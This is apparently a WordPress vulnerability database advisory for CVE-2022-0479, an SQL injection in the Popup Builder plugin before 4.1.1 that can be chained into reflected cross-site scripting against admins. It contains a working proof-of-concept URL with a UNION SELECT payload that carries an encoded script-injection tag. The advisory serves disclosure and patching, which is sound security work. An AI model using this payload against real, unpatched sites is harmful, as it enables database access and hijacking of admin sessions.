WordPress Plugin Vulnerabilities

Popup Builder < 4.1.1 - SQL Injection to Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a malicious link

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e%2C3%2C4%2C5%2C6+--+g

Affects Plugins

Plugin icon
popup-builder
Fixed in 4.1.1

References

CVE
CVE-2022-0479
URL
https://plugins.trac.wordpress.org/changeset/2686454

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
0d2bbbaf-fbfd-4921-ba4e-684e2e77e816

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2023-03-06
Title
WP Statistics < 14.0 - Authenticated SQLi
Published
2023-10-30
Title
wp image slideshow < 12.1 - Authenticated (Subscriber+) SQL Injection via Shortcode
Published
2024-04-09
Title
AIKit <= 4.14.1 - Authenticated (Contributor+) SQL Injection
Published
2014-09-24
Title
All Video Gallery 1.2 - SQL Injection
Published
2014-08-01
Title
WP RSS Poster 1.0.0 - wp-admin/admin.php wrp-add-new Page id Parameter SQL Injection